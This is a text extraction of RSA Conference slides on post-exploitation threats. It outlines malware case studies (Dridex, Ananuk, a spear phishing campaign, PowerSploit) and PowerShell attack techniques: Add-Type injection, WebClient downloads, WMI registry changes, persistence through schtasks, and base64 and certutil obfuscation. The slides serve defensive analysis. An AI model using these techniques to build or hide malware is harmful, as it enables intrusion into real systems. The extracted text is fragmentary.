Send GET request
![Page 73: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/73.jpg)
#RSAC
Appendix – Case Study 1 B - Dridex
73
Receive Response Body and write to File
![Page 74: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/74.jpg)
#RSAC
Appendix – Case Study 1 B - Dridex
74
Save To Disk
Execution
![Page 75: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/75.jpg)
#RSAC
Appendix – Case Study 2 - Ananuk
75
Entrypoint
De-obfuscate
![Page 76: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/76.jpg)
#RSAC
Appendix – Case Study 2 - Ananuk
76
Beacon and Deploy final Payload
De-Obfuscate
![Page 77: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/77.jpg)
#RSAC
Appendix – Case Study 2 - Ananuk
77
Beacon Command & Control – Phase 1
Deobfuscate
![Page 78: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/78.jpg)
#RSAC
Appendix – Case Study 2 - Ananuk
78
Beacon Command & Control – Phase 2
Deobfuscate
![Page 79: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/79.jpg)
#RSAC
Appendix – Case Study 2 - Ananuk
79
Deploy Base64 Payload
Write Base64 Decoded Payloadto Temp Path
Execute Payload
![Page 80: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/80.jpg)
#RSAC
Appendix – Case Study 2 - Ananuk
80
Analyzing Payload 1
Payload is an iconUsed for credibility
Attempts to gain persistency on the Victim’s machine both by using knownAutorun registry paths and by creating
A scheduled task using the schtasks command
![Page 81: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/81.jpg)
#RSAC
Appendix – Powershell Indicators of Suspicious Activity
81
.NET Objects.NET ReflectionAdd-TypeNew-Object
WinAPI32 DLL LoadingWMI Objects
Invoke-WmiMethod
Command ExecutionInvoke-Command
COM ObjectsNew-Object –Com
![Page 82: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/82.jpg)
#RSAC
Appendix – Powershell Obfuscation
82
Obfuscation Methods
Base64
SecureString
Custom Decoding Methods
![Page 83: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/83.jpg)
#RSAC
Powershell Techniques - .NET Reflection
83
Example 1 – LoadWithPartialName
Example 2 - LoadName
![Page 84: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/84.jpg)
#RSAC
Powershell Techniques - Add-Type .NET code injection
84
Creation of a new type/class using .NET code
Creating an instance of the class and invoking it’s Start method
![Page 85: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/85.jpg)
#RSAC
Powershell Techniques – New-Object
85
Creating an object instanceIn this example System.Net.WebClient instance is created in order to download a file
![Page 86: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/86.jpg)
#RSAC
Powershell Techniques - Invoke-WmiMethod
86
Using WMI for enumeration and system maniupulationIn this case creating a key in the windows registry
![Page 87: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/87.jpg)
#RSAC
Powershell Techniques - DLL loading
87
Resolving Native Win32 API functions
$module = “kernel32.dll”
API Function to be resolved
![Page 88: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/88.jpg)
#RSAC
Powershell Techniques - New-Object -com
88
Similarly to the COM objects in VBAThe same COM objects can be used in Powershell using this command
![Page 89: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/89.jpg)
#RSAC
Powershell Techniques Obfuscation
89
Obfuscation methods in PowershellAdding Ticks (Escapes special characters but ignored if used non-special characters) + Lowercase/UppercaseString Concatenation/ManipulationGet-Command + WildCards + AliasesInvoke-Expression
![Page 90: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/90.jpg)
#RSAC
Powershell Techniques Obfuscation - Base64
90
Base64 using .NET classes
CertUtilBy Executing the certutil tool as a commandcertutil -decode encodedInputFileName decodedOutputFileName
![Page 91: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/91.jpg)
#RSAC
Case Study 3 – Targeted Spear Phishing Campaign
91
Javascript outer script with obfuscated strings
Base64 encoded payloadsEach string in the list is reversed
A list of string includingcommands and base64
Encoded payloads
![Page 92: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/92.jpg)
#RSAC
Case Study 3 – Targeted Spear Phishing Campaign
92
Deploys 3 Powershell scripts on the victims machine
Payload 1 – .NET code injection using Add-Type
Creation of a new type/class using .NET code
Creating an instance of the class and invoking it’s Start method
![Page 93: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/93.jpg)
#RSAC
Case Study 3 – Targeted Spear Phishing Campaign
93
Payload 2 – .NET code injection using Add-Type like the 1st payload
Imports multiple Win32 api functions using .NET
![Page 94: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/94.jpg)
#RSAC
Case Study 3 – Targeted Spear Phishing Campaign
94
Payload 3 – Downloads TOR Proxifier as scheduled task
![Page 95: Isolating the Ghost in the Machine: Unveiling Post Exploitation Threats · PDF fileIsolating the Ghost in the Machine: Unveiling Post Exploitation Threats. HTA-R11. Senior Security](https://reader031.vdocuments.us/reader031/viewer/2022030501/5aad60567f8b9a693f8e4480/html5/thumbnails/95.jpg)
#RSAC
Case Study 4 – Powersploit + Invoke-Obfuscation
95
Open source project available on GitHub
PowerSploit includes capabilities such as:Shellcode injectionReflective DLL injectionWMICode executionMimikatz – NTLM/LM password dump
Invoke-Obfuscation is a Powershell code obfuscation framework developed by Daniel Bohannon